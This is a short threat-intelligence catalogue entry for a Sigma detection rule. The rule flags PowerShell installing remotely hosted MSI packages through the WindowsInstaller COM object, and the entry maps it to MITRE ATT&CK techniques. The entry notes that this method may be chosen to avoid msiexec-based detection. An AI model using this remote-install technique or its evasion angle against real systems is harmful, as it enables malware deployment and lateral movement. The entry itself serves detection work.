Skip to content

Hide Navigation Hide TOC

PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)

Detects the execution of PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer) hosted remotely. This could be indication of malicious software deployment or lateral movement attempts using Windows Installer functionality. And the usage of WindowsInstaller COM object rather than msiexec could be an attempt to bypass the detection.

Cluster A Galaxy A Cluster B Galaxy B Level
PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0) Sigma-Rules Ingress Tool Transfer - T1105 (e6919abc-99f9-4c6c-95a5-14761e7b2add) Attack Pattern 1
PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0) Sigma-Rules PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) Attack Pattern 1
PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0) Sigma-Rules System Binary Proxy Execution - T1218 (457c7820-d331-465a-915e-42f85500ccc4) Attack Pattern 1
Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830) Attack Pattern PowerShell - T1059.001 (970a3432-3237-47ad-bcca-7d8cbb217736) Attack Pattern 2